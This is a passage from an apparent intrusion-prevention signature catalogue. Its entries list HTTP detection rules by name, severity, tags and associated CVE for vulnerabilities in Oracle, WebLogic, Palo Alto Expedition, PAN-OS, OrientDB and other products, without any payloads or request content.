Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: Oracle-Application-Testing-Suite-Downloadservlet-Scenario-Directory-Traversal
Description:
Back to top

HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Schedulereportname-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: Oracle-Application-Testing-Suite-Download-Schedulereportname-Directory-Traversal
Description:
Back to top

HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Scriptpath-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: Oracle-Application-Testing-Suite-Downloadservlet-Scriptpath-Directory-Traversal
Description:
Back to top

HTTP_CRL-Oracle-Application-Testing-Suite-ReportImage-Tempfilename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Oracle-Application-Testing-Suite-ReportImage-Tempfilename-Directory-Traversal
Description:
Back to top

HTTP_CRL-Oracle-Application-Testing-Suite-Uploadfileaction-Filetype-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Oracle-Application-Testing-Suite-Uploadfileaction-Filetype-Directory-Traversal
Description:
Back to top

HTTP_CRL-Oracle-ATS-Downloadservlet-Exportfilename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-742-5211
Last changed: sgpkg-ips-742-5211
Vulnerability: Oracle-ATS-Downloadservlet-Exportfilename-Directory-Traversal
Description:
Back to top

HTTP_CRL-Oracle-ATS-Downloadservlet-Tmapreportimage-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Vulnerability: Oracle-ATS-Downloadservlet-Tmapreportimage-Directory-Traversal
Description:
Back to top

HTTP_CRL-Oracle-Bea-WebLogic-IIS-Connector-Jsessionid-Stack-Buffer-Overflow

About this situation: Oracle BEA WebLogic Server Jsessionid Stack Buffer Overflow
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Oracle BEA WebLogic, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-346-4219
Vulnerability: HTTP_Oracle-Bea-WebLogic-IIS-Connector-Jsessionid-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Oracle-Bea-WebLogic-Server-Apache-Connector-DoS

About this situation: Specially crafted HTTP request causes Denial of Service
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle BEA WebLogic, CVE2008, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-199-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Oracle-Bea-WebLogic-DOS
Description:
Back to top

HTTP_CRL-Oracle-Business-Intelligence-Biremotingservlet-Amf-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence BIRemotingServlet AMF detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Oracle-Business-Intelligence-CVE-2021-2456-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Oracle-Business-Intelligence-Publisher-Schedulerconfigpage11g-JNDI-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1388-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Oracle-Business-Intelligence-Publisher-Schedulerconfigpage11g-JNDI-Injection
Description:
Back to top

HTTP_CRL-Oracle-Business-Intelligence-Publisher-Updateconnectionservlet-JNDI-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: Oracle-Business-Intelligence-Publisher-Updateconnectionservlet-JNDI-Injection
Description:
Back to top

HTTP_CRL-Oracle-Client-System-Analyzer-Arbitrary-File-Upload

About this situation: An attempt to exploit an Oracle Client System Analyzer Arbitrary File Upload vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Database Server, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: Oracle-Client-System-Analyzer-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Oracle-Database-Application-Express-Password-Hash-Disclosure

About this situation: An attempt to exploit a vulnerability in Oracle APEX detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 11g, Oracle APEX, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: Oracle-Database-Application-Express-Password-Hash-Disclosure
Description:
Back to top

HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-Calendar-XSS

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1255-5242
Last changed: sgpkg-ips-1255-5242
Vulnerability: Oracle-E-Business-Suite-Advanced-Outbound-Telephony-Calendar-XSS
Description:
Back to top

HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2854-XSS

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2854-XSS
Description:
Back to top

HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2871-XSS

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2871-XSS
Description:
Back to top

HTTP_CRL-Oracle-E-Business-Suite-Biccfgd2.jsp-SQL-Injection-CVE-2016-0545

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Oracle-E-Business-Suite-Biccfgd2.jsp-SQL-Injection-CVE-2016-0545
Description:
Back to top

HTTP_CRL-Oracle-E-Business-Suite-Common-Applications-Calendar-CVE-2021-2114-XSS

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Vulnerability: Oracle-E-Business-Suite-Common-Applications-Calendar-CVE-2021-2114-XSS
Description:
Back to top

HTTP_CRL-Oracle-E-Business-Suite-Human-Resources-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite Human Resources detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2020, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1224-5242
Vulnerability: Oracle-E-Business-Suite-Human-Resources-SQL-Injection
Description:
Back to top

HTTP_CRL-Oracle-E-Business-Suite-Istore-Personal-Information-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1346-5242
Vulnerability: Oracle-E-Business-Suite-Istore-Personal-Information-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Oracle-E-Business-Suite-Knowledge-Management-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Vulnerability: Oracle-E-Business-Suite-Knowledge-Management-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Oracle-Fusion-Middleware-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle Fusion Middleware detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Oracle Fusion Middleware, CVE2012, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-660-5211
Vulnerability: Oracle-Fusion-Middleware-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Oracle-GlassFish-Server-Multiple-Stored-XSS-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Oracle Sun GlassFish Enterprise Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle GlassFish Server, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-1352-5242
Vulnerability: Oracle-GlassFish-Server-Multiple-Stored-XSS-Vulnerabilities
Description:
Back to top

HTTP_CRL-Oracle-Hospitality-Simphony-Directory-Traversal-CVE-2018-2636

About this situation: An attempt to exploit a vulnerability in Oracle Hospitality detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Hospitality, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Oracle-Hospitality-Simphony-Directory-Traversal-CVE-2018-2636
Description:
Back to top

HTTP_CRL-Oracle-HTTP-Server-Isqlplus-Cross-Site-Scripting

About this situation: Detects suspicious requests to Oracle HTTP Servers isqlplus component
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle HTTP Server, CVE2004, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-277-4219
Vulnerability: HTTP-Oracle-HTTP-Server-Isqlplus-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Oracle-Secure-Backup-Administration-Other-Variable-Command-Injection

About this situation: Attempt to exploit a command injection vulnerability in Oracle Secure Backup server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Oracle Secure Backup, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Oracle-Secure-Backup-Administration-Other-Variable-Command-Injection
Description:
Back to top

HTTP_CRL-Oracle-Secure-Backup-Administration-selector-Variable-Command-Injection

About this situation: An attempt to exploit a command execution vulnerability in Oracle Secure Backup server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Oracle-Secure-Backup-Administration-selector-Variable-Command-Injection
Description:
Back to top

HTTP_CRL-Oracle-Secure-Backup-Administration-Server-Authentication-Bypass

About this situation: An attempt to exploit an authentication bypass vulnerability in Oracle Secure Backup server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-325-4219
Last changed: sgpkg-ips-1412-5242
Vulnerability: Oracle-Secure-Backup-Administration-Server-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Oracle-Secure-Backup-Administration-Server-Command-Injection

About this situation: Attempt to exploit a command injection vulnerability in Oracle Secure Backup server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-240-3038
Last changed: sgpkg-ips-1589-5242
Vulnerability: Oracle-Secure-Backup-Administration-Server-Command-Injection
Description:
Back to top

HTTP_CRL-Oracle-Secure-Backup-Authentication-Bypass

About this situation: Specially crafted HTTP request allows unauthorized access
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-1412-5242
Vulnerability: Oracle-Secure-Backup-Server-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Execution

About this situation: Specially crafted HTTP request allows unauthorized command execution
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-1739-5242
Vulnerability: Oracle-Secure-Backup-Exec_qr-Command-Injection
Oracle-Secure-Backup-Command-Injection
Description:
Back to top

HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Injection

About this situation: Specially crafted HTTP request allows unauthorized command execution
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-1412-5242
Vulnerability: Oracle-Secure-Backup-Server-Login-Command-Injection
Description:
Back to top

HTTP_CRL-Oracle-Secure-Backup-Remote-Cookies-Command-Injection

About this situation: Specially crafted HTTP request allows unauthorized command execution
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-404-4219
Vulnerability: Oracle-Secure-Backup-Server-Login-Cookies-Command-Injection
Description:
Back to top

HTTP_CRL-Oracle-Single-Sign-On-Vulnerability

About this situation: An Oracle Single-Sign-On vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Oracle-Single-Sign-On-Vulnerability
Description:
Back to top

HTTP_CRL-Oracle-WebLogic-CVE-2019-2729-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1697-5242
Vulnerability: Oracle-WebLogic-CVE-2019-2729-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Oracle-WebLogic-Remote-Diagnosis-Assistant-Command-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Diagnosis Assistant detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Diagnosis Assistant, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1042-5242
Vulnerability: Oracle-WebLogic-Remote-Diagnosis-Assistant-Command-Injection
Description:
Back to top

HTTP_CRL-Oracle-WebLogic-Server-Admin-Console-War-Deployment

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: Oracle-WebLogic-Server-Admin-Console-War-Deployment
Description:
Back to top

HTTP_CRL-Oracle-WebLogic-Server-CVE-2020-14882

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1293-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Oracle-WebLogic-Server-CVE-2020-14882
Description:
Back to top

HTTP_CRL-Oracle-WebLogic-Server-CVE-2021-2109-JNDI-Injection

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: Oracle-WebLogic-Server-CVE-2021-2109-JNDI-Injection
Description:
Back to top

HTTP_CRL-Oracle-WebLogic-Server-Deserialization-RCE

About this situation: An attempt to exploit a vulnerability in Oracle Weblogic Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: Oracle-WebLogic-Server-Deserialization-RCE
Description:
Back to top

HTTP_CRL-OrientDB-Remote-Code-Execution

About this situation: An OrientDB Remote Code Execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, OrientDB, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1022-5242
Vulnerability: OrientDB-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-osCommerce-Installer-Unauthenticated-Code-Execution

About this situation: An osCommerce Installer Unauthenticated Code Execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, osCommerce, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: osCommerce-Installer-Unauthenticated-Code-Execution
Description:
Back to top

HTTP_CRL-OWASP-CoreRule-Request-944-Application-Attack-Java-944130

About this situation: A request containing a suspicious Java class/function detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1622-5242
Last changed: sgpkg-ips-1622-5242
Description:
Back to top

HTTP_CRL-OWASP-CoreRule-Request-944-Application-Attack-Java-944130-Potential

About this situation: A request containing a suspicious Java class/function detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1622-5242
Last changed: sgpkg-ips-1622-5242
Description:
Back to top

HTTP_CRL-PAJAX-Remote-Command-Execution

About this situation: An attempt to exploit a PAJAX Remote Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PAJAX, CVE2006, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: PAJAX-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Palo-Alto-Expedition-Command-Injection-CVE-2024-9463

About this situation: An attempt to exploit a vulnerability in Palo Alto Expedition
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Palo Alto Expedition, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Palo-Alto-Expedition-Command-Injection-CVE-2024-9463
Description:
Back to top

HTTP_CRL-Palo-Alto-Expedition-OS-Command-Injection-CVE-2024-9464

About this situation: An attempt to exploit a vulnerability in Palo Alto Expedition detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Palo Alto Expedition, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Palo-Alto-Expedition-OS-Command-Injection-CVE-2024-9464
Description:
Back to top

HTTP_CRL-Palo-Alto-Expedition-Regionsdiscovery.php-Insecure-Deserialization-CVE-2025-0107

About this situation: An attempt to exploit a vulnerability in Palo Alto Networks Expedition Migration Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Palo Alto Expedition, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Palo-Alto-Expedition-Regionsdiscovery.php-Insecure-Deserialization-CVE-2025-0107
Description:
Back to top

HTTP_CRL-Palo-Alto-Expedition-SQL-Injection-CVE-2024-9465

About this situation: An attempt to exploit a vulnerability in Palo Alto Expedition detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Palo Alto Expedition, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Vulnerability: Palo-Alto-Expedition-SQL-Injection-CVE-2024-9465
Description:
Back to top

HTTP_CRL-Palo-Alto-SSLVPN-Command-Execution-CVE-2024-9474

About this situation: An attempt to exploit a vulnerability in a Palo Alto appliance
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Palo Alto SSLVPN Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Palo-Alto-SSLVPN-Command-Execution-CVE-2024-9474
Description:
Back to top

HTTP_CRL-PAN-OS-GlobalProtect-Remote-Code-Execution-CVE-2019-1579

About this situation: An attempt to exploit a vulnerability in GlobalProtect detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GlobalProtect, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1379-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: PAN-OS-GlobalProtect-Remote-Code-Execution-CVE-2019-1579
Description:
Back to top

HTTP_CRL-PAN-OS-Remote-Code-Execution-CVE-2017-15944

About this situation: An attempt to exploit a vulnerability in PAN-OS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: PAN-OS, Any Hardware, CVE2017, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Vulnerability: PAN-OS-Remote-Code-Execution-CVE-2017-15944
Description:
Back to top

HTTP_CRL-Pandora-FMS-Authenticated-Command-Injection-CVE-2024-11320

About this situation: An attempt to exploit a vulnerability in Pandora FMS detected
Context: HTTP Normalized Request-Line
Severity: 7
